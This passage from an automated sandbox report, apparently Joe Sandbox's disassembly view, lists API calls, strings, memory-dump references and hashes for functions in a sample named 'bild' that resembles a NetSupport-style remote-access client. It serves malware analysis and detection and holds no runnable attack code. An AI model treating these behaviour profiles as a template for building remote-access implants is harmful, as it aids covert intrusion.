                                                                                                      • _malloc.LIBCMT ref: 110608BB
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,4764EAAA,00000000), ref: 110608FB
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                                      • _free.LIBCMT ref: 11060974
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                      • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                      • API String ID: 999355418-161875503
                                                                                                      • Opcode ID: 4c6701bf68cd5b1f6cb6252f17f9b7c7c7cabb80937af8afb4b53d9147c09ea9
                                                                                                      • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                                      • Opcode Fuzzy Hash: 4c6701bf68cd5b1f6cb6252f17f9b7c7c7cabb80937af8afb4b53d9147c09ea9
                                                                                                      • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                                      APIs
                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,4764EAAA,00000000,?), ref: 1115BA67
                                                                                                      • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                                      • wsprintfW.USER32 ref: 1115BAA7
                                                                                                      • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                                      • wsprintfW.USER32 ref: 1115BB67
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                      • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                      • API String ID: 3050498177-823534439
                                                                                                      • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                      • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                                      • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                      • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                                      APIs
                                                                                                      • _calloc.LIBCMT ref: 6C762FBB
                                                                                                      • GetTickCount.KERNEL32 ref: 6C76300D
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C76301B
                                                                                                      • _calloc.LIBCMT ref: 6C76303B
                                                                                                      • _memmove.LIBCMT ref: 6C763049
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 6C76307F
                                                                                                      • SetEvent.KERNEL32(0000030C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,938634B3), ref: 6C76308C
                                                                                                        • Part of subcall function 6C7628D0: wsprintfA.USER32 ref: 6C762965
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                      • String ID: a3vl$a3vl
                                                                                                      • API String ID: 3178096747-4199173775
                                                                                                      • Opcode ID: 8ba6bf065fb5f5d46d4210c1602475c676e49dbcb196ec43deff0d7bbbc39f90
                                                                                                      • Instruction ID: 8c54c14df1bfb31857a7a3fc212bdb8cfdeeea9174ac75e3965b85326cbe42f6
                                                                                                      • Opcode Fuzzy Hash: 8ba6bf065fb5f5d46d4210c1602475c676e49dbcb196ec43deff0d7bbbc39f90
                                                                                                      • Instruction Fuzzy Hash: 63417AB5D00209AFDB10DFA9C949AEFB7B8EF4C304F00452AE915E7640E7759509CBA1
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C770F2B,8A67EDB3,00000000,?,?,6C78F278,000000FF,?,6C75AE0A,?,00000000,?,00000080), ref: 6C770D48
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C770D5B
                                                                                                      • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C79CB4C,?,?,6C78F278,000000FF,?,6C75AE0A,?,00000000,?,00000080), ref: 6C770D76
                                                                                                      • _malloc.LIBCMT ref: 6C770D8C
                                                                                                        • Part of subcall function 6C771B69: __FF_MSGBANNER.LIBCMT ref: 6C771B82
                                                                                                        • Part of subcall function 6C771B69: __NMSG_WRITE.LIBCMT ref: 6C771B89
                                                                                                        • Part of subcall function 6C771B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C77D3C1,6C776E81,00000001,6C776E81,?,6C77F447,00000018,6C797738,0000000C,6C77F4D7), ref: 6C771BAE
                                                                                                      • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C78F278,000000FF,?,6C75AE0A,?,00000000,?), ref: 6C770D9F
                                                                                                      • _free.LIBCMT ref: 6C770D84
                                                                                                        • Part of subcall function 6C771BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C771C13
                                                                                                        • Part of subcall function 6C771BFD: GetLastError.KERNEL32(00000000), ref: 6C771C25
                                                                                                      • _free.LIBCMT ref: 6C770DAF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                      • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                      • API String ID: 1360380336-1843585929
                                                                                                      • Opcode ID: a1d650cf9e05785c943293a35d9df287f237cab5a743e41788f25243d97dfd45
                                                                                                      • Instruction ID: 4abf61d5f63977121b8f7010a825c59835d2caaa9c954af6ff991f54d66fa10c
                                                                                                      • Opcode Fuzzy Hash: a1d650cf9e05785c943293a35d9df287f237cab5a743e41788f25243d97dfd45
                                                                                                      • Instruction Fuzzy Hash: FC01F7B52003456BEA308B709E8AF5777AC9F45B08F20493CF9598FA80EA72F445C730
                                                                                                      APIs
                                                                                                        • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                        • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                      • _memset.LIBCMT ref: 11145485
                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                      • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                      • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                      • API String ID: 4251163631-545709139
                                                                                                      • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                      • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                                      • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                      • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                                      APIs
                                                                                                      • wsprintfA.USER32 ref: 110150CA
                                                                                                      • _memset.LIBCMT ref: 1101510E
                                                                                                      • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                                      Strings
                                                                                                      • %012d, xrefs: 110150C4
                                                                                                      • NSLSP, xrefs: 11015158
                                                                                                      • PackedCatalogItem, xrefs: 11015132
                                                                                                      • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue_memsetwsprintf
                                                                                                      • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                      • API String ID: 1333399081-1346142259
                                                                                                      • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                      • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                                      • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                      • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 2427920155-3145022300
                                                                                                      • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                      • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                                      • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                      • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766950
                                                                                                        • Part of subcall function 6C767BE0: _memset.LIBCMT ref: 6C767BFF
                                                                                                        • Part of subcall function 6C767BE0: _strncpy.LIBCMT ref: 6C767C0B
                                                                                                        • Part of subcall function 6C75A4E0: EnterCriticalSection.KERNEL32(6C79B898,00000000,?,?,?,6C75DA7F,?,00000000), ref: 6C75A503
                                                                                                        • Part of subcall function 6C75A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C75A568
                                                                                                        • Part of subcall function 6C75A4E0: Sleep.KERNEL32(00000000,?,6C75DA7F,?,00000000), ref: 6C75A581
                                                                                                        • Part of subcall function 6C75A4E0: LeaveCriticalSection.KERNEL32(6C79B898,00000000), ref: 6C75A5B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                      • String ID: 1.2$Blvl$Channel$Client$Publish %d pending services
                                                                                                      • API String ID: 1112461860-1868938008
                                                                                                      • Opcode ID: ce3d682a0f083c5a9e1b29d266cca1fe0b23777e58e251278f31ba6eecc5522b
                                                                                                      • Instruction ID: 76f1cb994656e5c5b630d36a4507cfc9e6123b2c92c4aef715fabbba4c714d76
                                                                                                      • Opcode Fuzzy Hash: ce3d682a0f083c5a9e1b29d266cca1fe0b23777e58e251278f31ba6eecc5522b
                                                                                                      • Instruction Fuzzy Hash: 9F51E331B052058BDF10EE7ADA48BAA7BB4BB0235DFA4013DDC55D3E81DB31A646C791
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                      • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                      • API String ID: 3494822531-1878648853
                                                                                                      • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                      • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                                      • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                      • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                      • std::exception::exception.LIBCMT ref: 11107414
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
